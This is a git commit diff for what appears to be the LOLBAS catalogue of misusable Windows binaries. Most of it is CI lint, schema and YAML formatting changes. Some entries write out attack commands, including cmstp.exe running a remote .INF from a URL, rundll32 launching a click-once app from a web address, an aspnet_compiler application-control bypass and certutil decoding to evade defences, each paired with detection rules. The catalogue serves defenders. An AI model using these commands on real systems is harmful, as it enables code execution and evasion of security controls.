Merge branch 'master' into alias_introduction

This commit is contained in:
Conor Richard 2022-09-15 13:54:50 -04:00 committed by GitHub
commit 3347e43b3f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
170 changed files with 622 additions and 602 deletions

8
.github/.yamllint vendored
View File

@ -4,12 +4,12 @@ yaml-files:
- '*.yml'
rules:
new-line-at-end-of-file:
level: warning
level: error
trailing-spaces:
level: warning
level: error
line-length:
level: warning
new-lines:
level: warning
level: error
indentation:
level: warning
level: error

View File

@ -16,7 +16,7 @@ jobs:
- name: Change .yml to .md
run: |
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts

View File

@ -1,19 +1,35 @@
---
name: YAML Lint
on:
push:
branches:
- master
pull_request:
branches:
- master
name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
on: [push,pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v1
- uses: actions/checkout@v3
- name: yaml-lint
uses: ibiqlik/action-yamllint@v3
with:
no_warnings: true
file_or_dir: yml/**/*.yml
config_file: .github/.yamllint
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml

35
.github/yaml-lint-reviewdog.yml.bak vendored Normal file
View File

@ -0,0 +1,35 @@
---
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
on: [pull_request]
jobs:
lintFiles:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run yamllint
uses: reviewdog/action-yamllint@v1
with:
level: error
reporter: github-pr-review # Change reporter.
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
- name: Validate OSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSBinaries/*.yml
schema: YML-Schema.yml
- name: Validate OSLibraries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSLibraries/*.yml
schema: YML-Schema.yml
- name: Validate OSScripts YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OSScripts/*.yml
schema: YML-Schema.yml
- name: Validate OtherMSBinaries YAML Schema
uses: cketti/action-pykwalify@v0.3-temp-fix
with:
files: yml/OtherMSBinaries/*.yml
schema: YML-Schema.yml

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

View File

@ -23,4 +23,3 @@ Resources:
Acknowledgement:
- Person: Bart
Handle: '@bartblaze'
---

View File

@ -15,4 +15,3 @@ Full_Path:
- Path: '%localappdata%\Whatsapp\Update.exe'
Detection:
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
---

View File

@ -25,4 +25,3 @@ Acknowledgement:
Handle: '@@vysecurity'
- Person: Adam (Internals)
Handle: '@Hexacorn'
---

118
YML-Schema.yml Normal file
View File

@ -0,0 +1,118 @@
---
type: map
mapping:
# Id field enhancement possibility commenting out for now
# "Id":
# type: str
# required: true
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
"Name":
type: str
required: true
"Description":
type: str
required: true
"Aliases":
type: seq
required: false
sequence:
- type: map
mapping:
"Alias":
type: str
required: false
"Author":
type: str
required: true
"Created":
type: date
required: true
"Commands":
type: seq
required: true
sequence:
- type: map
mapping:
"Command":
type: str
required: true
"Description":
type: str
required: true
"Usecase":
type: str
required: true
"Category":
type: str
required: true
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
"Privileges":
type: str
required: true
"MitreID":
type: str
required: true
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
"OperatingSystem":
type: str
required: true
"Full_Path":
type: seq
required: true
sequence:
- type: map
mapping:
"Path":
type: str
required: true
"Code_Sample":
type: seq
required: false
sequence:
- type: map
mapping:
"Code":
type: str
"Detection":
type: seq
required: false
sequence:
- type: map
mapping:
"IOC":
type: str
"Sigma":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Analysis":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Elastic":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Splunk":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"BlockRule":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Resources":
type: seq
required: false
sequence:
- type: map
mapping:
"Link":
type: str
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
"Acknowledgement":
type: seq
required: false
sequence:
- type: map
mapping:
"Person":
type: str
"Handle":
type: str
pattern: '^(@(\w){1,15})?$'

View File

@ -8,6 +8,8 @@ Created: YYYY-MM-DD (date the person created this file)
Commands:
- Command: The command
Description: Description of the command
Aliases:
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
Usecase: A description of the usecase
Category: Execute
Privileges: Required privs

View File

@ -20,4 +20,3 @@ Resources:
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---

View File

@ -1,28 +1,27 @@
---
Name: Aspnet_Compiler.exe
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
Description: Execute C# code with the Build Provider and proper folder structure in place.
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Code_Sample:
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
Resources:
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Acknowledgement:
- Person: cpl
Handle: '@cpl3h'
---
---
Name: Aspnet_Compiler.exe
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
Description: Execute C# code with the Build Provider and proper folder structure in place.
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Code_Sample:
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml
Resources:
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Acknowledgement:
- Person: cpl
Handle: '@cpl3h'

View File

@ -23,7 +23,7 @@ Detection:
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
Resources:
- Link: https://freddiebarrsmith.com/at.txt
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
Acknowledgement:
- Person: 'Freddie Barr-Smith'
@ -34,4 +34,3 @@ Acknowledgement:
Handle:
- Person: 'Xabier Ugarte-Pedrero'
Handle:
---

View File

@ -14,17 +14,14 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
Resources:
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---

View File

@ -48,4 +48,3 @@ Acknowledgement:
Handle: '@aionescu'
- Person: Asif Matadar
Handle: '@d1r4c'
---

View File

@ -46,7 +46,7 @@ Detection:
- IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream
Resources:
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@carnal0wnage'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Ensar Samil
Handle: '@sblmsrsn'
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: David Middlehurst
Handle: '@dtmsecurity'
---

View File

@ -39,7 +39,7 @@ Commands:
Privileges: User
MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures
Category: Decode
@ -75,4 +75,3 @@ Acknowledgement:
- Person: egre55
Handle: '@egre55'
- Person: Lior Adar
---

View File

@ -21,17 +21,14 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\cmd.exe
- Path: C:\Windows\SysWOW64\cmd.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- IOC: cmd.exe executing files from alternate data streams.
- IOC: cmd.exe creating/modifying file contents in an alternate data stream.
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- IOC: cmd.exe executing files from alternate data streams.
- IOC: cmd.exe creating/modifying file contents in an alternate data stream.
Resources:
- Link: https://twitter.com/yeyint_mth/status/1143824979139579904
Acknowledgement:
- Person: r0lan
Handle: '@yeyint_mth'
---

View File

@ -14,14 +14,11 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\cmdkey.exe
- Path: C:\Windows\SysWOW64\cmdkey.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
Resources:
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement:
- Person:
Handle:
---

View File

@ -23,4 +23,3 @@ Resources:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -14,24 +14,22 @@ Commands:
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- IOC: Execution of cmstp.exe without a VPN use case is suspicious
- IOC: DotNet CLR libraries loaded into cmstp.exe
- IOC: DotNet CLR Usage Log - cmstp.exe.log
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- IOC: Execution of cmstp.exe without a VPN use case is suspicious
- IOC: DotNet CLR libraries loaded into cmstp.exe
- IOC: DotNet CLR Usage Log - cmstp.exe.log
Resources:
- Link: https://twitter.com/NickTyrer/status/958450014111633408
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
@ -44,4 +42,3 @@ Acknowledgement:
Handle: '@oddvarmoe'
- Person: Nick Tyrer
Handle: '@NickTyrer'
---

View File

@ -29,4 +29,3 @@ Resources:
Acknowledgement:
- Person: Ialle Teixeira
Handle: '@NtSetDefault'
---

View File

@ -24,4 +24,3 @@ Acknowledgement:
Handle: '@hexacorn'
- Person: Wietze
Handle: '@wietze'
---

View File

@ -15,16 +15,16 @@ Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- IOC: Control.exe executing files from alternate data streams
- IOC: Control.exe executing library file without cpl extension
- IOC: Suspicious network connections from control.exe
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- IOC: Control.exe executing files from alternate data streams
- IOC: Control.exe executing library file without cpl extension
- IOC: Suspicious network connections from control.exe
Resources:
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -22,16 +22,15 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
- IOC: Csc.exe should normally not run as System account unless it is used for development.
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml
- IOC: Csc.exe should normally not run as System account unless it is used for development.
Resources:
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
Acknowledgement:
- Person:
Handle:
---

View File

@ -15,22 +15,21 @@ Full_Path:
- Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Cscript.exe executing files from alternate data streams
- IOC: DotNet CLR libraries loaded into cscript.exe
- IOC: DotNet CLR Usage Log - cscript.exe.log
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Cscript.exe executing files from alternate data streams
- IOC: DotNet CLR libraries loaded into cscript.exe
- IOC: DotNet CLR Usage Log - cscript.exe.log
Resources:
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Ialle Teixeira
Handle: '@NtSetDefault'
---

View File

@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Gal Kristal
Handle: '@gal_kristal'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -17,13 +17,12 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
Resources:
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@tim8288'
- Person: Hai Vaknin
Handle: '@vakninhai'
---

View File

@ -22,15 +22,14 @@ Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
- IOC: Child process from diskshadow.exe
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
- IOC: Child process from diskshadow.exe
Resources:
- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -15,10 +15,10 @@ Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
Resources:
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
@ -32,4 +32,3 @@ Acknowledgement:
Handle: '@dim0x69'
- Person: Nikhil SamratAshok
Handle: '@nikhil_mitt'
---

View File

@ -50,14 +50,14 @@ Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Code_Sample:
- Code:
- Code:
Detection:
